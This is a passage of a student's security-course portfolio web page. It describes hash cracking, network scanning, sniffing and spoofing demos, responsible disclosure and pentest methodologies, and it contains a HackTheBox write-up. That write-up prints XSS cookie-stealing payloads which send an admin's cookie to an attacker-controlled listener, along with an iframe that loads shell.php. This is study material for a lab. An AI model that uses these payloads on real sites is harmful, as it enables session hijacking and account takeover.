          <li>Rainbow tables</li>
          </ul>
          </p>
          <p>Brute forcing is the most basic way to crack a password, it just tries every possible
          combination of letters. It has a few pros and some big cons.</p>
          <p>Brute forcing is rarely used these days just for the simple reason that cracking a modern
          encrypted password would take more then a lifetime. It also costs a lot of computing
          power because it generates the hashes on the fly and there are a lot of hashes to
          generate and try. The pro is though that it doesn't use any storage space because it
          generates everything instead of getting them for a wordlist. Brute forcing could be an
          option when you know that the password that you're cracking isn't a existing word but
          rather a string of random numbers and letters. Even though brute forcing might be the
          only option in that case, you're probably better off finding another way to get the
          password.</p>
          <p>Dictionary attacks are more sophisticated, it's way more efficient and faster but there a
          big con.</p>
          <p>Dictionary attacks use a predefined list of words and generates hashes for them and then
          compare them to the hash you want to crack to see if any of them match. The pro is that
          this is way faster. The downside on the other hand is that if the password you want to
          crack isn't in the word list you have no chance of success. The dictionary attack could
          be extended by generating multiple versions of every word some with captitals some with
          random numbers after them etc. A dictionary attack could also be made very personal and
          tailored to the specifications of your target. For example adding the targets place of
          work or pet names to the list. Also if you want more chance of success you'll need a
          bigger word list and those can grow pretty fast costing thus a lot of storage space.</p>
          <p>Rainbow tables are in essence a lot like dictionary attacks, but actually better.</p>
          <p>Rainbow tables contain like a dictionary attack a wordlist. The difference is that the
          wordlist is already hashed and could contain all possible solutions making a look like a
          brute force. You could for instance create a rainbow table having every possible
          solution making it a bruto force but more efficient costing less time, or generate
          hashes for your dictionary attack wordlist which might be reusable costing you less time
          in the future. Rainbow tables do come with some downsides like it costs a lot of
          harddisk space, less then a dictionary attack of the same size because it uses lossless
          compression, but if you want a lot of possibilities it will still be a big file. The
          hash type like MD5 or SHA256 is static thus making it less versatile/useful when you
          don't know the encryption type. Same goes for the salt, a salt could be added to the
          list but it will make the file even bigger. A problem that you won't have with a
          dictionary attack or brute force because the hashes get generated in the fly.</p>
          <p>A good way to make encrypted passwords harder to crack is by using a salt or a pepper. A
          salt is random data added to the password before it's hashed, and because it's different
          for every new password it gets stored alongside the password. This has a pro and a con.
          The pro is that the salt is different for every password meaning that if one password
          gets compromised the others are still save. The downside is though that if someone
          breaches the database he will know the salts for each password instantly. Now a pepper
          uses the same method to encrypt a password, it is random data and adds it to the
          password before it's hashed. But a pepper is static and is stored separately from the
          password hashes. Now this method has a pro and con as well. The pro is that if the
          database is breached the hacker won't know the pepper making cracking the passwords a
          lot harder. The con is that if he finds the pepper all the passwords are compromised,
          but to do that he might need to decompile the code and find the pepper, which is a lot
          harder than breaching the database most of the time.</p>
          <a href="../../img/portfolio/red/CrackHashGenerate.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashGenerate.png" alt=""></a>
          <p>I created a small demonstration on hacking a simple MD5 hash. So I first of all created a
          hash for the string "password".</p>
          <a href="../../img/portfolio/red/CrackHashId.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashId.png" alt=""></a>
          <p>If I would have stole this hash from some database I might not know the hash type, which
          is important for me to know if I want to save time or use a rainbow table. So I ran
          "Hash-identifier" and gave it the hash. This gives me an idea what the hash type might
          be.</p>
          <a href="../../img/portfolio/red/CrackHashFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashFile.png" alt=""></a>
          <p>I placed the has in a file. In this case there's only one hash in there but in reality
          this list could contain all the hashes from a certain database.</p>
          <a href="../../img/portfolio/red/CrackHashResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashResult.png" alt=""></a>
          <p>Now I used "Hashcat" to crack the password using a wordlist called "rockyou". This
          wordlist contains the most common password based on data breaches in the past. As you
          can see it cracked the password and it only took 1 second. Do mind that in this case the
          password was high up in the wordlist. The program only went through 0.03% of the entire
          wordlist, if the password was much lower in the list this would take a lot longer.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Password cracking</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal14" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
           <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network scanning and enumeration</p>
          <p>To create a demo for this a made up a scenario. The scenario is that I got VPN access to
          a place I want to hack and I want to know how the network looks like. This is no actual
          hack but mere a VPN tunnel to my own home.</p>
          <a href="../../img/portfolio/red/NetworkScanConnVPN.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanConnVPN.png" alt=""></a>
          <p>So I looked up in which IP range I was so I had a clue from which I could continue.</p>
          <a href="../../img/portfolio/red/NetworkScanDone.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDone.png" alt=""></a>
          <p>I did a network scan using NMap in the ip range that I was connected to. As you can see
          on the left hand side there are some machines that came up in the scan which I could
          take a look at.</p>
          <a href="../../img/portfolio/red/NetworkScanTopology.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanTopology.png" alt=""></a>
          <p>I took a look at the topology of the network first. This is a easy way to get an overview
          of the network, all with connected routers, AP's and switches. I can also see in this
          diagram that there are some devices in red which mean they have 6 or more open ports,
          those devices might be more interesting to me</p>
          <a href="../../img/portfolio/red/NetworkScanNASHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASHost.png" alt=""></a>
          <p>I see that this machine is different from the rest, it's the only one running FreeBSD so
          that might be interesting.</p>
          <a href="../../img/portfolio/red/NetworkScanNASPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASPorts.png" alt=""></a>
          <p>This machine has open ports for the smb protocol which could mean this is a NAS. I could
          use this information to go further and get for example access to the samba shares.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterHost.png" alt=""></a>
          <p>Using the before mentioned topology graph I noticed that the router has a lot of open
          ports as well. Getting into a network's router could give me more access to other parts
          of the network.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterPorts.png" alt=""></a>
          <p>Here I can see that the router has some open ports for ssh, telnet and some webserver I
          can poke at.</p>
          <a href="../../img/portfolio/red/NetWorkScanDesktopHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanDesktopHost.png" alt=""></a>
          <p>While looking at the topology graph I saw another machine with a lot of open ports so I
          took a look, and it looks like a windows machine.</p>
          <a href="../../img/portfolio/red/NetworkScanDesktopPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDesktopPorts.png" alt=""></a>
          <p>There are a few different open ports on this machine then other regular desktops. Like a
          MariaDB which I could try to access or take a look at the webserver. The Windows RPC
          protocol is running on an open port which I can utilize to get in because there are some
          known exploits for that.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network scanning and enumeration</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal15" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network sniffing and spoofing</p>
          <p>I will show 2 little demos as a proof of concept.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPSite.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPSite.png" alt=""></a>
          <p>I have a "pi-hole" server running on my network that acts as my home dns server. It has a
          login screen for a dashboard with statistics but it is not HTTPS secured. So I tried
          catching the password with Wireshark while logging in.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPResult.png" alt=""></a>
          <p>When I filter Wireshark to only HTTP and logged in in te website I can see my IP and the
          website's IP. When I open the packet and took a look what's inside, you can see the form
          post with password in plain text. Now this website doesn't hash the password so I can
          see the password in plain text, otherwise I would have seen a hash which I had to
          decrypt to get the password.</p>
          <a href="../../img/portfolio/red/ScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/ScapyPacket.png" alt=""></a>
          <p>I created a fake IPV4 packet using "scapy". I made it so that it looks like the packet is
          coming from google, but It's actually from me and I put my malicious code in it.</p>
          <a href="../../img/portfolio/red/WireSharkScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WireSharkScapyPacket.png" alt=""></a>
          <p>I captured the packet with Wireshark and as you can see the source address is google, but
          when you look in the raw my malicious code is in there.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network sniffing and spoofing</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal16" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Law, Ethics and Responsible Disclosure</p>
          <p>The Ethics are both quite abstract though logical at the same time. The are written in an
          abstract manner in which they could apply to even other things than hacking. Thus making
          it logical as well. Many things you wouldn't do to someone in real life you wouldn't do
          online. I think it's the same point <a href="https://www.youtube.com/watch?v=HmZm8vNHBSU">these</a> guys tried to make,
          except badly executed.</p>
          <P>In my opinion the internet is one of the last few free places there are in the world.
          Though sometimes tightly controlled by governments, look at China or North-Korea, people
          still find ways around the system to express their voices. I agree with the ethics being
          like gentlemen rules, just don't be a dick to someone, don't do anything you wouldn't
          want to be done to yourself. But this doesn't include expressing your opinion even
          though it might hurt some people. On the internet you still got the right to say those
          things the same as people having the right to disagree and say something about it. While
          in the real world when you say something wrong people will call it a form of
          discrimination and you'll get prosecuted. Thus undermining the freedom of speech and
          creating more and more censorship.</P>
          <p>These are the responsible disclosures of companies I compared.</p>
          <ul>
          <li><a href="https://www.google.com/about/appsecurity/">Google</a></li>
          <li><a href="https://support.apple.com/en-us/HT201220">Apple</a></li>
          <li>
          <a href="https://fontys.nl/Over-Fontys/Organisatie-en-sturing/Onze-organisatieNieuw/Regelingen-statuten-en-reglementen/Responsible-disclosure-Fontys-Hogescholen.htm">Fontys</a>
          </li>
          </ul>
          <p>The first things that stood out to me was the rewards. While Google and Apple being big
          corporations reward the people with big sums of money, the Fontys rewards them by
          putting their name on the wall of fame. Looking at other smaller companies it is more
          common to give some merchandise, putting their names on the hall of fame or giving a
          small amount of money compared to the big numbers Google and Apple are giving as
          rewards.</p>
          <p>What they all have in common is that they want a full detailed report of what you did so
          they can reproduce the scenario. They all don't want you to make anything public before
          they had a chance to fix it and don't dig any deeper in sensitive date that is necessary
          to proof the vulnerability.</p>
          <p>They all also state that even though you did anything illegal while proofing the
          vulnerability, if you follow their responsible disclosure and follow their rules they
          won't pursue any legal actions.</p>
          <p>It is quite logical that companies don't prosecute these people and give them rewards
          instead, because if you think about it they will lose far less money when they pay these
          rewards then if they get hacked by a real threat. Looking at <a href="https://www.bugcrowd.com/bug-bounty-list/">this</a> website a lot of
          companies share that same ideology.</p>
          <ul class="list-inline">
          <li>Date: December 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Law, Ethics and Responsible Disclosure</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal17" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Basic hacking process</p>
          <p>First lets talk about the basic hacking process. This is a process most hackers will
          follow when conducting a hack, good or bad. Though good and bad use this process there
          is a key difference between the two.</p>
          <a href="../../img/portfolio/red/hackingstappen.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/hackingstappen.png" alt=""></a>
          <p>These are the basic hacking steps that are needed to conduct a good hack.</p>
          <h3>Intel Gathering</h3>
          <p>Intel gathering is the first step in the basic hacking process. In this step the hacker
          tries to gain as much information on his target as possible. He'll conduct for instance
          a OSINT, go to the physical location of his target and get a feel for the place and
          maybe even use social engineering to call his target and try to extract information.</p>
          <h3>Footprint</h3>
          <p>Now the hacker will conduct a network scan and try to gain as much information on the
          target's network as possible. He needs to find a foothold from which he can continue
          further, think about ip ranges, open ports, OS versions and important servers.</p>
          <h3>Vuln Analysis</h3>
          <p>The hacker will now look for any out of date software or operating systems to use
          exploits on. Whenever he'll find a software version he'll look if there's a CVE entry
          for that he could exploit. He might also use some automated tools to find common
          vulnerabilities for him. The hacker will also try any website for web vulnerabilities
          like SQL injection, command injection, CSRF and XSS.</p>
          <h3>Exploitation</h3>
          <p>Now is time for action. The hacker will use the information and vulnerabilities he found
          in the previous step to use his exploits. Thus gaining access to his target or the
          information he's after. Most ethical hackers/pentesters will stop after this step or not
          even do this step at all because it might result in destabilizing or shutting down the
          targets network.</p>
          <h3>Post Exploitation</h3>
          <p>This step and the following is more applicable to the bad actors out there. Here the
          hacker will extract the data he's after, edit some data, create new accounts and setup
          persistence for a backdoor so he can come back later without going through the same
          process again or have the risk of the target patching the vulnerability he used.</p>
          <h3>Clean Up</h3>
          <p>This step is very important for bad actors to not get caught. Here the hacker will try to
          remove all of his footsteps like logs. Therefore the police or target will not be able
          to track him down or even know what he did in the first place.</p>
          <a href="../../img/portfolio/red/Cyber-Kill-Chain.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/Cyber-Kill-Chain.png" alt=""></a>
          <p>Now this is the cyber kill chain even though it's comparable to the basic hacking process
          there are some differences.</p>
          <h3>Reconnaissance</h3>
          <p>Here the hacker will conduct recon comparable to the intel gathering stage in the basic
          hacking process.</p>
          <h3>Weaponization</h3>
          <p>In this step the hacker is already creating a payload with an exploit to attack his
          target. It is notable that in the cyber killchain they skip the footprint and vuln
          analysis stages.</p>
          <h3>Delivery</h3>
          <p>Now the payload is to be delivered to the target this can be done by phising email,
          rubber ducky and so on. This stage is also not present in the basic hacking process,
          there it's more part of the exploitation stage.</p>
          <h3>Exploitation</h3>
          <p>When the payload is delivered the hacker will activate his attack.</p>
          <h3>Installation</h3>
          <p>In this stage the hacker will install for example malware to create persistence for a
          backdoor or to act more stealthy. This would happen in the post exploitation stage in
          the basic hacking process.</p>
          <h3>Command & Control</h3>
          <p>Now the installed malware will call back to the command and control system and give the
          hacker control of the hacked system. This can be both part of the exploitation and post
          exploitation stage in the basic hacking process.</p>
          <h3>Actions on Objectives</h3>
          <p>Here the hacker will do whatever his intentions were.</p>
          <h4>The minimal requirements for a good pentest contract and pentest report</h4>
          <p>In a good pentest contract there should be a clearly defined scope and procedures in case
          of emergency. The contract should also include a confidentiality agreement. The pentest
          report should include the scope and goal of the project with the findings and how it was
          done. It should be explained very carefully and readable for people that weren't aware
          of the project. The most important thing is ofcourse the advice to give to the company,
          this way they'll be able to fix any security leaks and the pentest was a success.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Basic hacking process</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal18" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Self reflection</p>
          <p>The semester started quite slowly for me. It wasn't really clear for me were I should
          start and were I should look for the right information. This semester was quite
          different from the defending one. In the defending semester everything went quite easy
          and smooth and I had a clear goal that I wanted to achieve, I felt like I missed that
          this semester, hens why it didn't start so smoothly.</p>
          <p>I started this semester with absolutely no knowledge in hacking into things. I learned
          quite a lot this semester, must of the things I learned listening to podcasts and
          understanding the different concepts and trying different things on DVWA.</p>
          <p>I still don't really feel like I could actually conduct a good pentest and find some
          decent results after this semester which I think sucks, because I feel like I should. I
          do think I've the knowledge but I feel like I lack the How-to. I did think I would be
          quite good at defending a network and building one after previous semester, so I think
          it's a combination between a lack of goals and guidance.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Self reflection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal19" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Cyber4Z</h2>
          <p class="item-intro text-muted">My internship at Cyber4Z</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: June 2021</li>
          <li>Client: Cyber4Z</li>
          <li>Category: Internship</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
           </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal20" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Pen-testing methodologies</p>
          <p>The standard and most popular pentest methodology is the Lockheed Martin cyber killchain.
          It's a basic process that explains the order of action a criminal hacker would follow.
          Thus also making it a viable ethical hacker methodology.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png" alt=""></a>
          <p>Knowing what step a attacker is taking or needs to take is good to know. But it's also
          good to know how to mitigate or prevent each step of the cyber killchain.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg" alt=""></a>
          <p>Other than the Lockheed Martin cyber killchain there are a few other
          frameworks/methodologies, like the well-known OWASP.</p>
          <ol>
          <li>OSSTMM (Open Source Security Testing Methodology Manual)</li>
          <li>OWASP (Open Web Application Security Project)</li>
          <li>NIST (The National Institute of Standards and Technology)</li>
          <li>PTES (Penetration Testing Methodologies and Standards)</li>
          <li>ISSAF (Information System Security Assessment Framework)</li>
          </ol>
          <a href="https://www.vumetric.com/blog/top-penetration-testing-methodologies/">Source</a>
          <p><b>OSSTMM</b> is a peer-reviewed security assessment standard for testing and auditing
          systems and providing them with a risk score</p>
          <p><b>OWASP</b> is used as a methodology to pentest websites and web applications.</p>
          <p><b>NIST</b> is a very strict standard and they promote themselves as functionality
          driven. They mainly focus on helping federal agencies comply with regulations.</p>
          <p><b>PTES</b> is a structured approach to pentesting and looks a lot like the Lockheed
          Martin cyber killchain.</p>
          <p><b>ISSAF</b> is a pentesting methodology where the pentester imitates a hacker. This also
          looks a lot like the Lockheed Martin cyber killchain.</p>
          <p>Apart from all these methodologies there's another well known entity known by not only
          red teamers but also well-known by the blue teamers. This framework is known as the <a href="https://attack.mitre.org/">Mitre ATT&CK Framework</a> this framework
          contains almost every possible way to attack a network or machine.</p>
          <p>I've used the Mitre ATT&CK framework a lot when monitoring the SOC in my home network.
          Wazuh automatically categorizes the incoming alert in the Mitre ATT&CK framework. On the
          opposite side from te red teamer perspective I've used OWASP and the Lockheed Martin
          cyber killchain a lot. Mostly when performing pentests but also when cracking machines
          on Hackthebox and when participating in CTF events.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal21" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Linux Write-up</p>
          <a href="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <code>sudo nmap -v -A -sS earlyaccess.htb</code>
          <a href="img/portfolio/minor/red/htb_linux/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/NMapOutput.png" alt=""></a>
          <p>From the scan we can see that port 80 (http), 443 (https) and 22 (ssh) are open. Nothing
          special to see here really. Maybe we'll have more luck in finding something with
          GoBuster.</p>
          <code>gobuster dir -x 'php, xml, html, js, css, txt, md' -u earlyaccess.htb -w
          /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/GoBusterOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GoBusterOutput.png" alt=""></a>
          <p>From the looks of it all the tries get redirected and these are all false positives.
          Let's try Ffuf as a last enumeration method in order to find hidden subdomains.</p>
          <code>ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://earlyaccess.htb -H "Host:
          FUZZ.earlyaccess.htb" -mc 200</code>
          <a href="img/portfolio/minor/red/htb_linux/FfufOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FfufOutput.png" alt=""></a>
          <p>Looks like we got a few interesting hits. So I'll add those to my /etc/Hosts file so we
          can take a look at them later on. So let's create a test account on the main page and
          let's see what we can find.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png" alt=""></a>
          <p>Interesting we can see a messaging service, a forum, a store and a place to register a
          key. We can also edit our own account. Let's take a look at the forum.</p>
          <a href="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png" alt=""></a>
          <p>Some guy on the forum told the staff that his username caused an issue on the scoreboard,
          and because his username is SingleQuoteMan I feel like this is a nod towards either XSS
          or SQLI. We can probably steal a cookie from the admin if we use XSS in our username,
          because it will run when we message a staff member for support.</p>
          <a href="img/portfolio/minor/red/htb_linux/SendingMessage.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SendingMessage.png" alt=""></a>
          <p>Now we'll just need to find a XSS script that will steal the cookie for us so we can use
          it. I tried a fair number of PHP cookie stealers but with out any luck.</p>
          <p> I tried to follow this guide <a href="https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/">https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/</a>
          and tried a number of different XSS scripts.
          </p>
          <code class="prettyprint">&#x3C;img src=x onerror=this.src='http://10.10.14.40:8888/'</code>
          <a href="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png" alt=""></a>
          <code class="prettyprint">&#x3C;iframe src=http://10.10.14.40:8888/shell.php height=”0”
          width=”0”>&#x3C;/iframe></code>
          <p>But none of these worked. I did manage to steal my own cookie but when I tried stealing
          the admin's I get an "Unsupported ssl" error. So I probably have to make the cookie
          stealer server run on https. But before that I wanted to try to steal it one more time
          without using Java Springboot.</p>
          <a href="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png" alt=""></a>
          <p>It was a longshot but worth the try because Springboot does a lot of stuff underwater and
          it just works most of the time. I used another XSS script as well because the other ones
          spammed my terminal full of bogus output.</p>
          <code class="prettyprint">&#x3C;script>document.location="http://10.10.14.88:8888/cookie?c="
          +
          document.cookie&#x3C;/script></code>
          <a href="img/portfolio/minor/red/htb_linux/AdminCookieJava.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AdminCookieJava.png" alt=""></a>
          <p>And this worked! We got the admin cookie now all that's left is to change our cookie to
          the admin's and refresh the page!</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png" alt=""></a>
          <p>We are logged in as admin but now what? From the looks of it we got a few new tabs in the
          navbar. Game and Dev are the subdomains we've already found but admin could be
          interesting.</p>
          <a href="img/portfolio/minor/red/htb_linux/ValidateAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ValidateAPI.png" alt=""></a>
          <p>It is an admin panel mostly used to validate game keys.</p>
          <a href="img/portfolio/minor/red/htb_linux/GameKeyForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GameKeyForum.png" alt=""></a>
          <p>If we look back at the forum we can see that they are having trouble validating the game
          keys and that they resorted to an offline manual method. Let's download the offline key
          validator and see what we can find.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          #!/usr/bin/env python3
                                          import sys
                                          from re import match
          
                                          class Key:
                                          key = ""
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
          
                                          def __init__(self, key:str, magic_num:int=346):
                                          self.key = key
                                          if magic_num != 0:
                                          self.magic_num = magic_num
          
                                          @staticmethod
                                          def info() -> str:
                                          return f"""
                                          # Game-Key validator #
          
                                          Can be used to quickly verify a user's game key, when the API is down (again).
          
                                          Keys look like the following:
                                          AAAAA-BBBBB-CCCC1-DDDDD-1234
          
                                          Usage: {sys.argv[0]}
                                          &#x3C;game-key&#x3E;"""
          
                                              def valid_format(self) -> bool:
                                              return
                                              bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                              self.key))
          
                                              def calc_cs(self) -> int:
                                              gs = self.key.split('-')[:-1]
                                              return sum([sum(bytearray(g.encode())) for g in gs])
          
                                              def g1_valid(self) -> bool:
                                              g1 = self.key.split('-')[0]
                                              r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                              if r != [221, 81, 145]:
                                              return False
                                              for v in g1[3:]:
                                              try:
                                              int(v)
                                              except:
                                              return False
                                              return len(set(g1)) == len(g1)
          
                                              def g2_valid(self) -> bool:
                                              g2 = self.key.split('-')[1]
                                              p1 = g2[::2]
                                              p2 = g2[1::2]
                                              return sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
          
                                              def g3_valid(self) -> bool:
                                              # TODO: Add mechanism to sync magic_num with API
                                              g3 = self.key.split('-')[2]
                                              if g3[0:2] == self.magic_value:
                                              return sum(bytearray(g3.encode())) == self.magic_num
                                              else:
                                              return False
          
                                              def g4_valid(self) -> bool:
                                              return [ord(i)^ord(g) for g, i in zip(self.key.split('-')[0],
                                              self.key.split('-')[3])] == [12, 4, 20, 117, 0]
          
                                              def cs_valid(self) -> bool:
                                              cs = int(self.key.split('-')[-1])
                                              return self.calc_cs() == cs
          
                                              def check(self) -> bool:
                                              if not self.valid_format():
                                              print('Key format invalid!')
                                              return False
                                              if not self.g1_valid():
                                              return False
